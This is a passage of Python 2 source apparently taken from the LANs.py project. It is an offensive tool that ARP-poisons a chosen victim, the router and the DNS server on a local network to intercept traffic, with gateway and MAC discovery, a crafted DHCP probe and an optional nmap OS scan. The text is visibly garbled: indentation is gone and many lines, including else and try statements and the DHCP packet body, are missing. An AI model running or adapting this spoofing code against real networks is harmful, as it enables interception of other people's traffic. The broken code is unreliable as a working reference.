sys.exit('[-] When reading from pcap file you may only include the following arguments: -v, -u, -p, -pcap [pcap filename], and -ip [victim IP address]')

if args.pcap:

if args.ipaddress:

victimIP = args.ipaddress

pcap = rdpcap(args.pcap)

for payload in pcap:


sys.exit('[-] Finished parsing pcap file')


sys.exit('[-] Please include the following arguement when reading from a pcap file: -ip [target\'s IP address]')


sys.exit('[-] When reading from pcap file you may only include the following arguments: -v, -u, -p, -pcap [pcap filename], and -ip [victim IP address]')

# Main loop

def main(args):

global victimIP, interface

if args.pcap:


sys.exit('[-] Finished parsing pcap file')

#Check if root

if not geteuid()==0:

exit("\nPlease run as root\n")

#Find the gateway and interface

ipr = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN)

ipr = ipr.communicate()[0]

iprs = ipr.split('\n')

ipr = ipr.split()

if args.routerip:

routerIP = args.routerip


routerIP = ipr[2]

for r in iprs:

if '/' in r:

IPprefix = r.split()[0]

if args.interface:

interface = args.interface


interface = ipr[4]

if 'eth' in interface or 'p3p' in interface:

exit('[-] Wired interface found as default route, please connect wirelessly and retry or specify the active interface with the -i [interface] option. See active interfaces with [ip addr] or [ifconfig].')

if args.ipaddress:

victimIP = args.ipaddress


au = active_users()

au.users(IPprefix, routerIP)

print '\n[*] Turning off monitor mode'

os.system('/usr/sbin/airmon-ng stop %s >/dev/null 2>&1' % au.monmode)


victimIP = raw_input('[*] Enter the non-router IP to spoof: ')

except KeyboardInterrupt:

exit('\n[-] Quitting')

print "[*] Checking the DHCP and DNS server addresses..."

# DHCP is a pain in the ass to craft

dhcp = (Ether(dst='ff:ff:ff:ff:ff:ff')/










), "end"]))

ans, unans = srp(dhcp, timeout=5, retry=1)

if ans:

for s,r in ans:

DHCPopt = r[0][DHCP].options

DHCPsrvr = r[0][iP].src

for x in DHCPopt:

if 'domain' in x:

local_domain = x[1]



local_domain = 'None'

if 'name_server' in x:

dnsIP = x[1]


print "[-] No answer to DHCP packet sent to find the DNS server. Setting DNS and DHCP server to router IP."

dnsIP = routerIP

DHCPsrvr = routerIP

local_domain = 'None'

# Print the vars

print_vars(DHCPsrvr, dnsIP, local_domain, routerIP, victimIP)

if args.routermac:

routerMAC = args.routermac

print "[*] Router MAC: " + routerMAC

logger.write("[*] Router MAC: "+routerMAC+'\n')



routerMAC = Spoof().originalMAC(routerIP)

print "[*] Router MAC: " + routerMAC

logger.write("[*] Router MAC: "+routerMAC+'\n')

except Exception:


print "[-] Router did not respond to ARP request for MAC, attempting to pull the MAC from the ARP cache"

arpcache = Popen(['/usr/sbin/arp', '-n'], stdout=PIPE, stderr=DN)

split_lines = arpcache.communicate()[0].splitlines()

arpoutput = split_lines[1].split()

routerMAC = arpoutput[2]

print "[*] Router MAC: " + routerMAC

logger.write("[*] Router MAC: "+routerMAC+'\n')

except Exception:

sys.exit("[-] [arp -n] failed to give accurate router MAC address")

if args.victimmac:

victimMAC = args.victimmac

print "[*] Victim MAC: " + victimMAC

logger.write("[*] Victim MAC: "+victimMAC+'\n')



victimMAC = Spoof().originalMAC(victimIP)

print "[*] Victim MAC: " + victimMAC

logger.write("[*] Victim MAC: "+victimMAC+'\n')

except Exception:

exit("[-] Could not get victim MAC address; try the -vmac [xx:xx:xx:xx:xx:xx] option if you know the victim's MAC address")

if dnsIP != routerIP:


dnsMAC = Spoof().originalMAC(dnsIP)

print "[*] DNS server MAC: " + dnsMAC

except Exception:

print "[-] Could not get DNS server MAC address; continuing"

if dnsIP == routerIP:

dnsMAC = routerMAC




if args.nmap:

print "\n[*] Running [nmap -T4 -O "+victimIP+"] this may take several minutes..."


nmap = Popen(['/usr/bin/nmap', '-T4', '-O', '-e', interface, victimIP], stdout=PIPE, stderr=DN)


nmap = nmap.communicate()[0].splitlines()

for x in nmap:

if x != '':

print '[+]',x

logger.write('[+] '+x+'\n')

except Exception:

print '[-] Nmap port and OS scan failed, is it installed?'

print ''

# Cleans up if Ctrl-C is caught

def signal_handler(signal, frame):

print 'learing iptables, sending healing packets, and turning off IP forwarding...'


open('/proc/sys/net/ipv4/ip_forward', 'w').write('0\n')

if not dnsIP == routerIP and dnsMAC:

Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)

Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)

os.system('/sbin/iptables -F')

os.system('/sbin/iptables -X')

os.system('/sbin/iptables -t nat -F')

os.system('/sbin/iptables -t nat -X')

Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)

Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)


signal.signal(signal.SIGINT, signal_handler)

while 1:

# If DNS server is different from the router then we must spoof ourselves as the DNS server as well as the router

if not dnsIP == routerIP and dnsMAC:

Spoof().poison(dnsIP, victimIP, dnsMAC, victimMAC)

Spoof().poison(routerIP, victimIP, routerMAC, victimMAC)


if __name__ == "__main__":


Source: https://github.com/DanMcInerney/LANs.py

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